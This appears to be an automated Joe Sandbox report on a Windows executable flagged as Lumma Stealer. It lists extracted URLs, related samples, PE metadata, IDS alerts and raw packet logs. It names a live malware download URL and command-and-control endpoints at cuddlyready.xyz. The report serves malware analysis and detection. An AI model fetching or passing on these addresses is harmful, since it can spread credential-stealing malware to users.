                                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiFjFeChttqA.exe, 00000000.00000002.2266880286.0000000006030000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2176838867.0000000006031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://cuddlyready.xyz/FjFeChttqA.exe, 00000000.00000003.2262271308.000000000193D000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000002.2264382430.00000000018B9000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256533273.00000000018B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.FjFeChttqA.exe, 00000000.00000003.2176838867.0000000006031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=FjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=FjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://ocsp.rootca1.amazontrust.com0:FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://cuddlyready.xyz/-FjFeChttqA.exe, 00000000.00000003.2130098244.00000000060B0000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2130210926.00000000060B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://www.ecosia.org/newtab/FjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctaFjFeChttqA.exe, 00000000.00000002.2266880286.0000000006030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brFjFeChttqA.exe, 00000000.00000003.2154654502.0000000006353000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://cuddlyready.xyz:443/apiBitwardeooFjFeChttqA.exe, 00000000.00000003.2201737747.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000002.2264473271.000000000190E000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256533273.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2180512483.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2262304891.000000000190B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://cuddlyready.xyz/dFjFeChttqA.exe, 00000000.00000002.2264551472.000000000193D000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2262271308.000000000193D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://ac.ecosia.org/autocomplete?q=FjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://cuddlyready.xyz:443/apiFjFeChttqA.exe, 00000000.00000003.2130273838.00000000060B0000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2130098244.00000000060B0000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2130237981.00000000060B0000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2130380012.00000000060B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://cuddlyready.xyz:443/apintFjFeChttqA.exe, 00000000.00000003.2201737747.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000002.2264473271.000000000190E000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256533273.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2262304891.000000000190B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgFjFeChttqA.exe, 00000000.00000003.2176838867.0000000006031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://crl.microFjFeChttqA.exe, 00000000.00000003.2201737747.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256533273.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2180512483.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2262304891.000000000190B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgFjFeChttqA.exe, 00000000.00000002.2266880286.0000000006030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://x1.c.lencr.org/0FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://x1.i.lencr.org/0FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://cuddlyready.xyz/apiPFjFeChttqA.exe, 00000000.00000003.2262452656.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000002.2264382430.00000000018D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://cuddlyready.xyz/uoFjFeChttqA.exe, 00000000.00000003.2219245311.000000000193D000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256430845.000000000193D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchFjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refFjFeChttqA.exe, 00000000.00000002.2266880286.0000000006030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477FjFeChttqA.exe, 00000000.00000002.2266880286.0000000006030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://support.mozilla.org/products/firefoxgro.allFjFeChttqA.exe, 00000000.00000003.2154654502.0000000006353000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=FjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs
                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              172.67.150.173
                                                                                                              cuddlyready.xyzUnited States
                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                              Analysis ID:1579752
                                                                                                              Start date and time:2024-12-23 08:34:13 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 5m 30s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:4
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:FjFeChttqA.exe
                                                                                                              renamed because original name is a hash value
                                                                                                              Original Sample Name:e21681ef00ebfaee22cd2137a1349de0.exe
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                                                              EGA Information:Failed
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              • Number of executed functions: 0
                                                                                                              • Number of non-executed functions: 1
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .exe
                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                              • Execution Graph export aborted for target FjFeChttqA.exe, PID 5568 because there are no executed function
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              TimeTypeDescription
                                                                                                              02:35:08API Interceptor8x Sleep call for process: FjFeChttqA.exe modified
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              172.67.150.173RDFchOT4i0.exeGet hashmaliciousUnknownBrowse
                                                                                                              • artemis-rat.comartemis-rat.com:443
                                                                                                              063837646WAYBILLMAR24.exeGet hashmaliciousRedLineBrowse
                                                                                                              • artemis-rat.comartemis-rat.com:443
                                                                                                              SecuriteInfo.com.Trojan.DownLoaderNET.943.16578.26938.exeGet hashmaliciousUnknownBrowse
                                                                                                              • artemis-rat.comartemis-rat.com:443
                                                                                                              DHL- Shipping invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • artemis-rat.comartemis-rat.com:443
                                                                                                              DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • artemis-rat.comartemis-rat.com:443
                                                                                                              Kazeem Engineering and Technical Services.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                                                                              POs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                                                                              PO-065-01-2024E-2.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                                                                              New Orders#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • artemis-rat.comartemis-rat.com:443
                                                                                                              Payment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • artemis-rat.comartemis-rat.com:443
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              cuddlyready.xyzmG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.150.173
                                                                                                              w23Vg439U1.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                              • 172.67.150.173
                                                                                                              pfY4k1qisn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                              • 172.67.150.173
                                                                                                              LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.32.96
                                                                                                              0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                              • 172.67.150.173
                                                                                                              Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 193.143.1.9
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              CLOUDFLARENETUSmG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.150.173
                                                                                                              w23Vg439U1.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                              • 172.67.150.173
                                                                                                              pfY4k1qisn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                              • 172.67.150.173
                                                                                                              LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.32.96
                                                                                                              0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                              • 172.67.150.173
                                                                                                              zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.36.201
                                                                                                              0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                              • 172.67.199.72
                                                                                                              Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.36.201
                                                                                                              NE4jxHLxXJ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                              • 172.67.199.72
                                                                                                              U8mbM8r793.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                              • 172.67.199.72
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              a0e9f5d64349fb13191bc781f81f42e1mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.150.173
                                                                                                              w23Vg439U1.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                              • 172.67.150.173
                                                                                                              pfY4k1qisn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                              • 172.67.150.173
                                                                                                              LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.150.173
                                                                                                              0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                              • 172.67.150.173
                                                                                                              zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.150.173
                                                                                                              0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                              • 172.67.150.173
                                                                                                              Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.150.173
                                                                                                              NE4jxHLxXJ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                              • 172.67.150.173
                                                                                                              OGBLsboKIF.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.150.173
                                                                                                              No context
                                                                                                              No created / dropped files found
                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):6.541186488035888
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:FjFeChttqA.exe
                                                                                                              File size:2'953'728 bytes
                                                                                                              MD5:e21681ef00ebfaee22cd2137a1349de0
                                                                                                              SHA1:0159be57037eff8abb75c7c241d74f3c6d664739
                                                                                                              SHA256:d4acd1d3bf333f1c82682d9dde01e983efb126548bea388ec3adddbedbbc094c
                                                                                                              SHA512:ad3d4ea7a9173e7740d14fad32fce3cc78f2cc00fb5c33a5a325177cb8668c964b0a094bd5bfff20e2644e795469f76d2fc576deaf3a60353615f559bb995646
                                                                                                              SSDEEP:49152:V6wY+7AFAyRyVj4KNgYL+zS2BPKNYIHZHnoKwP:IwYaA6yRyVj4sSBBiNYcH2
                                                                                                              TLSH:40D55CE3B50A75CFD48E27B8D42BCD8A999D43B9071058C3A87C687A7E63CD025F9D24
                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g............................../...........@.......................... 0......1-...@.................................T0..h..
                                                                                                              Icon Hash:00928e8e8686b000
                                                                                                              Entrypoint:0x6ff000
                                                                                                              Entrypoint Section:.taggant
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:6
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:6
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:6
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                              Instruction
                                                                                                              jmp 00007F5D68E75F6Ah
                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x530540x68.idata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x531f80x8.idata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              0x10000x510000x24800069e303aee15a1d55025d64efdbbf6c2False0.9973779965753424data7.980628422807776IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .rsrc 0x520000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .idata 0x530000x10000x20019a29171433eeef17e42fd663f137134False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              ratrotcd0x540000x2aa0000x2a92009cf78f9a3a1fa61de6860a5eb41f5c3aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              lzuhqlsd0x2fe0000x10000x4006c7bef4d4dba46821991f8ce542ffe17False0.794921875data6.206173563676118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .taggant0x2ff0000x30000x2200af11e172f6f0afa53def0cf1e7a86e3eFalse0.06881893382352941DOS executable (COM)0.7690160347359208IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              DLLImport
                                                                                                              kernel32.dlllstrcpy
                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2024-12-23T08:35:08.458441+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549704172.67.150.173443TCP
                                                                                                              2024-12-23T08:35:09.233152+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549704172.67.150.173443TCP
                                                                                                              2024-12-23T08:35:09.233152+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549704172.67.150.173443TCP
                                                                                                              2024-12-23T08:35:10.457322+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705172.67.150.173443TCP
                                                                                                              2024-12-23T08:35:11.233480+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549705172.67.150.173443TCP
                                                                                                              2024-12-23T08:35:11.233480+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705172.67.150.173443TCP
                                                                                                              2024-12-23T08:35:12.837500+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706172.67.150.173443TCP
                                                                                                              2024-12-23T08:35:13.877851+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549706172.67.150.173443TCP
                                                                                                              2024-12-23T08:35:15.206047+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707172.67.150.173443TCP
                                                                                                              2024-12-23T08:35:17.578298+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708172.67.150.173443TCP
                                                                                                              2024-12-23T08:35:20.274938+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709172.67.150.173443TCP
                                                                                                              2024-12-23T08:35:22.759800+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549711172.67.150.173443TCP
                                                                                                              2024-12-23T08:35:27.066778+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549722172.67.150.173443TCP
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 23, 2024 08:35:07.238006115 CET49704443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:07.238042116 CET44349704172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:07.238168955 CET49704443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:07.239990950 CET49704443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:07.240006924 CET44349704172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:08.458350897 CET44349704172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:08.458441019 CET49704443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:08.463052988 CET49704443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:08.463059902 CET44349704172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:08.463365078 CET44349704172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:08.504034996 CET49704443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:08.514955997 CET49704443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:08.514991999 CET49704443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:08.515070915 CET44349704172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:09.233123064 CET44349704172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:09.233218908 CET44349704172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:09.233347893 CET49704443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:09.235230923 CET49704443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:09.235265970 CET44349704172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:09.235282898 CET49704443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:09.235290051 CET44349704172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:09.245287895 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:09.245322943 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:09.245444059 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:09.245788097 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:09.245791912 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:10.457159042 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:10.457321882 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:10.459404945 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:10.459414959 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:10.459634066 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:10.463804960 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:10.463831902 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:10.463866949 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.233438015 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.233520985 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.233551979 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.233576059 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.233766079 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.233766079 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.233781099 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.241766930 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.241951942 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.241957903 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.257889032 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.257997036 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.258084059 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.258091927 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.258152008 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.353111029 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.394644976 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.394661903 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.429270983 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.429302931 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.429373980 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.429383039 CET44349705172.67.150.173192.168.2.5
